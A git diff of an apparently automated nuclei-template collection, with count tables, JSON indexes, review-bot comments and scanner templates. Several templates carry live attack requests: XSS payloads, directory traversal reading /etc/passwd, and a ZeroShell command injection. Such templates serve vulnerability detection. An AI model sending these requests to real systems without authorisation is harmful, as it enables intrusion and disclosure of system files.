@@ -21,53 +21,117 @@ | CVE-2017 | 395 | | CVE-2018 | 445 | | CVE-2019 | 511 | -| CVE-2020 | 592 | -| CVE-2021 | 1731 | +| CVE-2020 | 591 | +| CVE-2021 | 1732 | | CVE-2022 | 2456 | -| CVE-2023 | 4724 | -| CVE-2024 | 4295 | -| Other | 23673 | +| CVE-2023 | 4723 | +| CVE-2024 | 4335 | +| Other | 23731 | ## 近几天数量变化情况 -|2024-08-02 | 2024-08-03 | 2024-08-04 | 2024-08-05 | 2024-08-06 | 2024-08-07 | 2024-08-08| +|2024-08-03 | 2024-08-04 | 2024-08-05 | 2024-08-06 | 2024-08-07 | 2024-08-08 | 2024-08-09| |--- | ------ | ------ | ------ | ------ | ------ | ---| -|40680 | 40674 | 40708 | 40712 | 40706 | 40721 | 40790| +|40674 | 40708 | 40712 | 40706 | 40721 | 40790 | 40887| ## 最近新增文件 | templates name | | --- | -| PeopleSoft-XXE-1.yaml | -| Jenkins-RCE.yaml | -| hikvision-detection-1.yaml | -| sensitive-storage-data-exposure-3.yaml | -| sensitive-storage-data-exposure-6.yaml | -| OpenTSDB-RCE-1.yaml | -| ApacheSolr-SSRF-1.yaml | -| ApacheSolr-SSRF-6.yaml | -| sensitive-storage-data-exposure-2.yaml | -| exposed-nomad-7329.yaml | -| ApacheStruts-RCE.yaml | -| ApacheSolr-SSRF-4.yaml | -| Confluence-SSRF.yaml | -| ApacheSolr-SSRF-5.yaml | -| PeopleSoft-XXE-2.yaml | -| php-proxy-detect-1.yaml | -| ApacheSolr-SSRF-2.yaml | -| ApacheSolr-SSRF-3.yaml | -| Shellshock-RCE-1.yaml | -| sensitive-storage-data-exposure-5.yaml | -| JBoss-SSRF.yaml | -| OpenTSDB-RCE-2.yaml | -| sensitive-storage-data-exposure-1.yaml | -| sensitive-storage-data-exposure-4.yaml | -| CVE-2023-0285.yaml | -| CVE-2023-47238.yaml | -| cve-2020-4463.yaml | -| CVE-2020-29164.yaml | -| CVE-2020-11034.yaml | -| CVE-2020-14179.yaml | -| CVE-2024-6522.yaml | -| cve-2024-3400.yaml | -| CVE-2024-7355.yaml | -| CVE-2024-7353.yaml | -| CVE-2022-1617.yaml | -| cve-2021-32030.yaml | -| cve-2021-28918.yaml | +| sysaid-help-desk.yaml | +| 帆软数据决策系统.yaml | +| dahua-智慧园区综合管理平台.yaml | +| panabit-panalog.yaml | +| 天问物业erp系统.yaml | +| 致远a8n.yaml | +| tin-canny-learndash-reporting.yaml | +| 东方通tongweb应用服务器.yaml | +| 金蝶apusic应用服务器.yaml | 
+| 致远a6s协同管理软件.yaml | +| 大华智能物联icc综合管理平台.yaml | +| 瑞友应用虚拟化系统.yaml | +| news-flash.yaml | +| inspur-政务系统.yaml | +| tos.yaml | +| 宇视vs-isc5000-e.yaml | +| 拓尔思was.yaml | +| multipurpose.yaml | +| 企望制造erp系统.yaml | +| 奥威亚视屏云平台.yaml | +| dokmee ecm.yaml | +| netflow-analyzer-zoho-traffic-management.yaml | +| the-next.yaml | +| 帆软报表.yaml | +| apollo-adminservice.yaml | +| kubio.yaml | +| kingdee-eas.yaml | +| 致远a6-s协同管理软件.yaml | +| h3c secpath 运维审计系统.yaml | +| Cache_to_xss.yaml | +| 致远协创a6协同办公软件.yaml | +| 海翔云平台.yaml | +| 泛普建筑工程施工oa.yaml | +| 致远g6-n多组织版.yaml | +| nagios-status-page-3.yaml | +| readynas_surveillance.yaml | +| 广联达oa.yaml | +| 致远a8-v5协同管理软件.yaml | +| 用友致远a6协同办公软件.yaml | +| 铭飞mcms.yaml | +| linkerd-service-detect.yaml | +| 云时空社会化商业erp系统.yaml | +| casbin.yaml | +| 致远g6-sc多组织版.yaml | +| 微宏oa.yaml | +| tamronos iptv系统.yaml | +| kingdee产品.yaml | +| 致远a6-m协同管理软件.yaml | +| orchid-store.yaml | +| 拓尔思sso.yaml | +| 慧点oa.yaml | +| cf7-message-filter.yaml | +| 指掌易.yaml | +| 泛微-oa e-cology8.yaml | +| openrefine.yaml | +| vmware-vsphere-web-client.yaml | +| 致远a8-m企业集团版.yaml | +| officeweb365.yaml | +| 用友-fe协作办公平台.yaml | +| 汉得srm云平台.yaml | +| cve-2017-7615.yaml | +| CVE-2024-39646.yaml | +| CVE-2024-6987.yaml | +| CVE-2024-7560.yaml | +| CVE-2024-38693.yaml | +| CVE-2024-6824.yaml | +| CVE-2024-6869.yaml | +| CVE-2024-5975.yaml | +| CVE-2024-6254.yaml | +| CVE-2024-39656.yaml | +| CVE-2024-7561.yaml | +| CVE-2024-5668.yaml | +| CVE-2024-7548.yaml | +| CVE-2024-39663.yaml | +| CVE-2024-39668.yaml | +| CVE-2024-39661.yaml | +| CVE-2024-39649.yaml | +| CVE-2024-39653.yaml | +| CVE-2024-39665.yaml | +| CVE-2024-7486.yaml | +| CVE-2024-39643.yaml | +| CVE-2024-5226.yaml | +| CVE-2024-6552.yaml | +| CVE-2024-7150.yaml | +| CVE-2024-5057.yaml | +| CVE-2024-39651.yaml | +| CVE-2024-7008.yaml | +| CVE-2024-41628.yaml | +| CVE-2024-39660.yaml | +| CVE-2024-39652.yaml | +| CVE-2024-39648.yaml | +| CVE-2024-39658.yaml | +| CVE-2024-7492.yaml | +| CVE-2024-39641.yaml | +| 
CVE-2024-40422.yaml | +| CVE-2024-39655.yaml | +| CVE-2024-39647.yaml | +| CVE-2024-7350.yaml | +| CVE-2024-39664.yaml | +| CVE-2024-39659.yaml | +| CVE-2024-39642.yaml | diff --git a/data.json b/data.json index a3d5c2609a..d36989bb5f 100644 --- a/data.json +++ b/data.json @@ -152,5 +152,6 @@ "2024-08-05": 40712, "2024-08-06": 40706, "2024-08-07": 40721, - "2024-08-08": 40790 + "2024-08-08": 40790, + "2024-08-09": 40887 } \ No newline at end of file diff --git a/data1.json b/data1.json index 27414993ad..c3f6445e77 100644 --- a/data1.json +++ b/data1.json 
@@ -48365,5 +48365,106 @@ "CVE-2024-7353.yaml": "2024-08-08 02:14:27", "CVE-2022-1617.yaml": "2024-08-08 02:14:27", "cve-2021-32030.yaml": "2024-08-08 02:14:27", - "cve-2021-28918.yaml": "2024-08-08 02:14:27" + "cve-2021-28918.yaml": "2024-08-08 02:14:27", + "sysaid-help-desk.yaml": "2024-08-09 02:15:51", + "帆软数据决策系统.yaml": "2024-08-09 02:15:51", + "dahua-智慧园区综合管理平台.yaml": "2024-08-09 02:15:51", + "panabit-panalog.yaml": "2024-08-09 02:15:51", + "天问物业erp系统.yaml": "2024-08-09 02:15:51", + "致远a8n.yaml": "2024-08-09 02:15:51", + "tin-canny-learndash-reporting.yaml": "2024-08-09 02:15:51", + "东方通tongweb应用服务器.yaml": "2024-08-09 02:15:51", + "金蝶apusic应用服务器.yaml": "2024-08-09 02:15:51", + "致远a6s协同管理软件.yaml": "2024-08-09 02:15:51", + "大华智能物联icc综合管理平台.yaml": "2024-08-09 02:15:51", + "瑞友应用虚拟化系统.yaml": "2024-08-09 02:15:51", + "news-flash.yaml": "2024-08-09 02:15:51", + "inspur-政务系统.yaml": "2024-08-09 02:15:51", + "tos.yaml": "2024-08-09 02:15:51", + "宇视vs-isc5000-e.yaml": "2024-08-09 02:15:51", + "拓尔思was.yaml": "2024-08-09 02:15:51", + "multipurpose.yaml": "2024-08-09 02:15:51", + "企望制造erp系统.yaml": "2024-08-09 02:15:51", + "奥威亚视屏云平台.yaml": "2024-08-09 02:15:51", + "dokmee ecm.yaml": "2024-08-09 02:15:51", + "netflow-analyzer-zoho-traffic-management.yaml": "2024-08-09 02:15:51", + "the-next.yaml": "2024-08-09 02:15:51", + "帆软报表.yaml": "2024-08-09 02:15:51", + "apollo-adminservice.yaml": "2024-08-09 02:15:51", + "kubio.yaml": "2024-08-09 02:15:51", + "kingdee-eas.yaml": "2024-08-09 02:15:51", + "致远a6-s协同管理软件.yaml": "2024-08-09 02:15:51", + "h3c secpath 运维审计系统.yaml": "2024-08-09 02:15:51", + "Cache_to_xss.yaml": "2024-08-09 02:15:51", + "致远协创a6协同办公软件.yaml": "2024-08-09 02:15:51", + "海翔云平台.yaml": "2024-08-09 02:15:51", + "泛普建筑工程施工oa.yaml": "2024-08-09 02:15:51", + "致远g6-n多组织版.yaml": "2024-08-09 02:15:51", + "nagios-status-page-3.yaml": "2024-08-09 02:15:51", + "readynas_surveillance.yaml": "2024-08-09 02:15:51", + "广联达oa.yaml": "2024-08-09 02:15:51", + "致远a8-v5协同管理软件.yaml": 
"2024-08-09 02:15:51", + "用友致远a6协同办公软件.yaml": "2024-08-09 02:15:51", + "铭飞mcms.yaml": "2024-08-09 02:15:51", + "linkerd-service-detect.yaml": "2024-08-09 02:15:51", + "云时空社会化商业erp系统.yaml": "2024-08-09 02:15:51", + "casbin.yaml": "2024-08-09 02:15:51", + "致远g6-sc多组织版.yaml": "2024-08-09 02:15:51", + "微宏oa.yaml": "2024-08-09 02:15:51", + "tamronos iptv系统.yaml": "2024-08-09 02:15:51", + "kingdee产品.yaml": "2024-08-09 02:15:51", + "致远a6-m协同管理软件.yaml": "2024-08-09 02:15:51", + "orchid-store.yaml": "2024-08-09 02:15:51", + "拓尔思sso.yaml": "2024-08-09 02:15:51", + "慧点oa.yaml": "2024-08-09 02:15:51", + "cf7-message-filter.yaml": "2024-08-09 02:15:51", + "指掌易.yaml": "2024-08-09 02:15:51", + "泛微-oa e-cology8.yaml": "2024-08-09 02:15:51", + "openrefine.yaml": "2024-08-09 02:15:51", + "vmware-vsphere-web-client.yaml": "2024-08-09 02:15:51", + "致远a8-m企业集团版.yaml": "2024-08-09 02:15:51", + "officeweb365.yaml": "2024-08-09 02:15:51", + "用友-fe协作办公平台.yaml": "2024-08-09 02:15:51", + "汉得srm云平台.yaml": "2024-08-09 02:15:51", + "cve-2017-7615.yaml": "2024-08-09 02:15:51", + "CVE-2024-39646.yaml": "2024-08-09 02:15:51", + "CVE-2024-6987.yaml": "2024-08-09 02:15:51", + "CVE-2024-7560.yaml": "2024-08-09 02:15:51", + "CVE-2024-38693.yaml": "2024-08-09 02:15:51", + "CVE-2024-6824.yaml": "2024-08-09 02:15:51", + "CVE-2024-6869.yaml": "2024-08-09 02:15:51", + "CVE-2024-5975.yaml": "2024-08-09 02:15:51", + "CVE-2024-6254.yaml": "2024-08-09 02:15:51", + "CVE-2024-39656.yaml": "2024-08-09 02:15:51", + "CVE-2024-7561.yaml": "2024-08-09 02:15:51", + "CVE-2024-5668.yaml": "2024-08-09 02:15:51", + "CVE-2024-7548.yaml": "2024-08-09 02:15:51", + "CVE-2024-39663.yaml": "2024-08-09 02:15:51", + "CVE-2024-39668.yaml": "2024-08-09 02:15:51", + "CVE-2024-39661.yaml": "2024-08-09 02:15:51", + "CVE-2024-39649.yaml": "2024-08-09 02:15:51", + "CVE-2024-39653.yaml": "2024-08-09 02:15:51", + "CVE-2024-39665.yaml": "2024-08-09 02:15:51", + "CVE-2024-7486.yaml": "2024-08-09 02:15:51", + "CVE-2024-39643.yaml": 
"2024-08-09 02:15:51", + "CVE-2024-5226.yaml": "2024-08-09 02:15:51", + "CVE-2024-6552.yaml": "2024-08-09 02:15:51", + "CVE-2024-7150.yaml": "2024-08-09 02:15:51", + "CVE-2024-5057.yaml": "2024-08-09 02:15:51", + "CVE-2024-39651.yaml": "2024-08-09 02:15:51", + "CVE-2024-7008.yaml": "2024-08-09 02:15:51", + "CVE-2024-41628.yaml": "2024-08-09 02:15:51", + "CVE-2024-39660.yaml": "2024-08-09 02:15:51", + "CVE-2024-39652.yaml": "2024-08-09 02:15:51", + "CVE-2024-39648.yaml": "2024-08-09 02:15:51", + "CVE-2024-39658.yaml": "2024-08-09 02:15:51", + "CVE-2024-7492.yaml": "2024-08-09 02:15:51", + "CVE-2024-39641.yaml": "2024-08-09 02:15:51", + "CVE-2024-40422.yaml": "2024-08-09 02:15:51", + "CVE-2024-39655.yaml": "2024-08-09 02:15:51", + "CVE-2024-39647.yaml": "2024-08-09 02:15:51", + "CVE-2024-7350.yaml": "2024-08-09 02:15:51", + "CVE-2024-39664.yaml": "2024-08-09 02:15:51", + "CVE-2024-39659.yaml": "2024-08-09 02:15:51", + "CVE-2024-39642.yaml": "2024-08-09 02:15:51" } \ No newline at end of file diff --git a/links.csv b/links.csv index 420b00ad22..3a6ff5c7d0 100644 --- a/links.csv +++ b/links.csv @@ -437,3 +437,4 @@ https://github.com/aredspy/CVE-2021-41182-Tester https://github.com/fa-rrel/My-best-templates https://github.com/ahisec/nuclei-tps https://github.com/OctaYus/NucleiTemplates +https://github.com/rishikesh-j/Nuclei-Templates-Scrapped diff --git a/nuclei-templates/CVE-2000/CVE-2000-0114.yaml b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml new file mode 100644 index 0000000000..ecff9b7b80 --- /dev/null +++ b/nuclei-templates/CVE-2000/CVE-2000-0114.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2000-0114 + +info: + name: Microsoft FrontPage Extensions Check (shtml.dll) + author: r3naissance + severity: low + description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 + - https://www.exploit-db.com/exploits/19897 + classification: + cve-id: CVE-2000-0114 + remediation: Upgrade to the latest version. + tags: cve,cve2000,frontpage,microsoft,edb + +requests: + - method: GET + path: + - '{{BaseURL}}/_vti_inf.html' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "_vti_bin/shtml.dll" + +# Enhanced by mp on 2022/01/27 diff --git a/nuclei-templates/CVE-2000/cve-2000-0114.yaml b/nuclei-templates/CVE-2000/cve-2000-0114.yaml deleted file mode 100644 index 0050d0c90c..0000000000 --- a/nuclei-templates/CVE-2000/cve-2000-0114.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2000-0114 - -info: - name: Microsoft FrontPage Extensions Check (shtml.dll) - author: r3naissance - severity: low - description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - - https://www.exploit-db.com/exploits/19897 - classification: - cve-id: CVE-2000-0114 - remediation: Upgrade to the latest version. - tags: cve,cve2000,frontpage,microsoft - -requests: - - method: GET - path: - - '{{BaseURL}}/_vti_inf.html' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "_vti_bin/shtml.dll" - -# Enhanced by mp on 2022/01/27 
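Review bot: The request in the new CVE-2000-0114.yaml only fetches `/_vti_inf.html` and matches the string `_vti_bin/shtml.dll`, while the description is about an RPC POST to shtml.dll that discloses the anonymous account name. A hit therefore shows that the FrontPage info page is exposed, not that the disclosure works. I would state that in the file with a comment above `requests:`, for example `# Fingerprint only: confirms the FrontPage info page advertises shtml.dll; the RPC POST from the description is not sent.` The `remediation: Upgrade to the latest version.` line is also too generic to act on; a product-specific action (presumably removing or restricting `/_vti_bin/`, to be confirmed by the maintainer) would help whoever triages the finding.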
diff --git a/nuclei-templates/CVE-2006/CVE-2006-1681.yaml b/nuclei-templates/CVE-2006/CVE-2006-1681.yaml deleted file mode 100644 index 283b857a26..0000000000 --- a/nuclei-templates/CVE-2006/CVE-2006-1681.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2006-1681 - -info: - name: Cherokee HTTPD <=0.5 - Cross-Site Scripting - author: geeknik - severity: medium - description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. - reference: - - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/ - - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/ - - http://www.vupen.com/english/advisories/2006/1292 - - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 - classification: - cve-id: CVE-2006-1681 - tags: cherokee,httpd,xss,cve,cve2006 - -requests: - - method: GET - path: - - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2006/cve-2006-1681.yaml b/nuclei-templates/CVE-2006/cve-2006-1681.yaml new file mode 100644 index 0000000000..56aacf1327 --- /dev/null +++ b/nuclei-templates/CVE-2006/cve-2006-1681.yaml 
@@ -0,0 +1,34 @@ +id: CVE-2006-1681 + +info: + name: Cherokee HTTPD <=0.5 XSS + author: geeknik + severity: medium + description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + reference: + - https://www.securityfocus.com/bid/17408 + - https://nvd.nist.gov/vuln/detail/CVE-2006-1681 + - http://secunia.com/advisories/19587 + - http://www.securityfocus.com/bid/17408 + classification: + cve-id: CVE-2006-1681 + tags: cherokee,httpd,xss,cve,cve2006 + +requests: + - method: GET + path: + - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2007/cve-2007-5728.yaml b/nuclei-templates/CVE-2007/CVE-2007-5728.yaml similarity index 100% rename from nuclei-templates/CVE-2007/cve-2007-5728.yaml rename to nuclei-templates/CVE-2007/CVE-2007-5728.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-2398.yaml b/nuclei-templates/CVE-2008/CVE-2008-2398.yaml deleted file mode 100644 index 1f91e0a6b6..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-2398.yaml +++ /dev/null 
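Review bot: The body `word` matcher in the new cve-2006-1681.yaml is shown with an empty string (`- ""`). An empty string is a substring of any body, so with that value the template reduces to "status 200 and a text/html header" and would report hosts that never reflect the payload. If the committed file really holds an empty string, the matcher should carry the decoded marker that the request path injects, `- "</script><script>alert(document.domain)</script>"`, so that a hit proves the input came back unencoded. If the value was only lost when this page was rendered, nothing needs to change. The same empty `words` entry appears in the new cve-2008-2398.yaml, which would need its own decoded payload from its `appservlang` parameter.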
@@ -1,38 +0,0 @@ -id: CVE-2008-2398 - -info: - name: AppServ Open Project <=2.5.10 - Cross-Site Scripting - author: unstabl3 - severity: medium - description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. - reference: - - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/ - - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/ - - http://securityreason.com/securityalert/3896 - - https://nvd.nist.gov/vuln/detail/CVE-2008-2398 - classification: - cve-id: CVE-2008-2398 - tags: cve,cve2008,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/12 diff --git a/nuclei-templates/CVE-2008/cve-2008-2650.yaml b/nuclei-templates/CVE-2008/CVE-2008-2650.yaml similarity index 100% rename from nuclei-templates/CVE-2008/cve-2008-2650.yaml rename to nuclei-templates/CVE-2008/CVE-2008-2650.yaml diff --git a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml b/nuclei-templates/CVE-2008/CVE-2008-4668.yaml deleted file mode 100644 index 82ec98c146..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-4668.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2008-4668 - -info: - name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/6618 - - https://www.cvedetails.com/cve/CVE-2008-4668 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - - http://securityreason.com/securityalert/4464 - classification: - cve-id: CVE-2008-4668 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/CVE-2008-6080.yaml b/nuclei-templates/CVE-2008/CVE-2008-6080.yaml deleted file mode 100644 index 1384c89375..0000000000 --- a/nuclei-templates/CVE-2008/CVE-2008-6080.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: CVE-2008-6080 - -info: - name: Joomla! Component ionFiles 4.4.2 - File Disclosure - author: daffainfo - severity: high - description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: - - https://www.exploit-db.com/exploits/6809 - - https://www.cvedetails.com/cve/CVE-2008-6080 - - http://secunia.com/advisories/32377 - - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ - classification: - cve-id: CVE-2008-6080 - tags: cve,cve2008,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-2398.yaml b/nuclei-templates/CVE-2008/cve-2008-2398.yaml new file mode 100644 index 0000000000..367edc8dbf --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-2398.yaml 
@@ -0,0 +1,35 @@ +id: CVE-2008-2398 + +info: + name: AppServ Open Project 2.5.10 and earlier XSS + author: unstabl3 + severity: medium + description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + reference: + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 + - http://www.securityfocus.com/bid/29291 + - http://secunia.com/advisories/30333 + - http://securityreason.com/securityalert/3896 + classification: + cve-id: CVE-2008-2398 + tags: cve,cve2008,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2008/cve-2008-4668.yaml b/nuclei-templates/CVE-2008/cve-2008-4668.yaml new file mode 100644 index 0000000000..d14e0a3b1e --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-4668.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2008-4668 + +info: + name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/6618 + - https://www.cvedetails.com/cve/CVE-2008-4668 + - http://www.securityfocus.com/bid/31458 + - http://securityreason.com/securityalert/4464 + classification: + cve-id: CVE-2008-4668 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2008/cve-2008-6080.yaml b/nuclei-templates/CVE-2008/cve-2008-6080.yaml new file mode 100644 index 0000000000..7ce462f492 --- /dev/null +++ b/nuclei-templates/CVE-2008/cve-2008-6080.yaml 
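Review bot: The reference list in the new cve-2008-4668.yaml points at `http://www.securityfocus.com/bid/31458`, whereas the CVE-2008-4668.yaml this commit deletes used the archived copy `http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/`. That suggests the auto-update replaced a later revision with an earlier one, so I would keep the archived URL in the new file. The same swap shows in cve-2006-1681.yaml, cve-2008-2398.yaml and cve-2008-6080.yaml; the first two also lose the `# Enhanced by mp on 2022/08/12` trailer, and cve-2008-2398.yaml loses its NVD reference. If the job chooses between duplicate templates from several upstream repositories (not visible here), it should prefer the most recently revised copy.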
@@ -0,0 +1,31 @@ +id: CVE-2008-6080 + +info: + name: Joomla! Component ionFiles 4.4.2 - File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/6809 + - https://www.cvedetails.com/cve/CVE-2008-6080 + - http://secunia.com/advisories/32377 + - http://www.securityfocus.com/bid/31877 + classification: + cve-id: CVE-2008-6080 + tags: cve,cve2008,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-0545.yaml b/nuclei-templates/CVE-2009/CVE-2009-0545.yaml index 7f00ae437c..53e183ebd4 100644 --- a/nuclei-templates/CVE-2009/CVE-2009-0545.yaml +++ b/nuclei-templates/CVE-2009/CVE-2009-0545.yaml @@ -1,20 +1,19 @@ id: CVE-2009-0545 - info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action. reference: https://www.exploit-db.com/exploits/8023 severity: critical + classification: + cve-id: CVE-2009-0545 tags: cve,cve2009,zeroshell,kerbynet,rce - requests: - method: GET path: - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" - matchers: - type: regex part: body regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" 
diff --git a/nuclei-templates/CVE-2009/cve-2009-0932.yaml b/nuclei-templates/CVE-2009/CVE-2009-0932.yaml similarity index 100% rename from nuclei-templates/CVE-2009/cve-2009-0932.yaml rename to nuclei-templates/CVE-2009/CVE-2009-0932.yaml diff --git a/nuclei-templates/CVE-2009/CVE-2009-1496.yaml b/nuclei-templates/CVE-2009/CVE-2009-1496.yaml deleted file mode 100644 index 51ca80e5ee..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-1496.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2009-1496 - -info: - name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. - reference: - - https://www.exploit-db.com/exploits/8367 - - https://www.cvedetails.com/cve/CVE-2009-1496 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - - http://www.securityfocus.com/bid/34431 - classification: - cve-id: CVE-2009-1496 - tags: cve,cve2009,joomla,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-1558.yaml b/nuclei-templates/CVE-2009/CVE-2009-1558.yaml deleted file mode 100644 index 7a8af924bc..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-1558.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: CVE-2009-1558 - -info: - name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal - author: daffainfo - severity: high - description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. - reference: - - https://www.exploit-db.com/exploits/32954 - - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713 - - http://www.vupen.com/english/advisories/2009/1173 - - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ - classification: - cve-id: CVE-2009-1558 - tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml b/nuclei-templates/CVE-2009/CVE-2009-2100.yaml deleted file mode 100644 index 71625701ca..0000000000 --- a/nuclei-templates/CVE-2009/CVE-2009-2100.yaml +++ /dev/null 
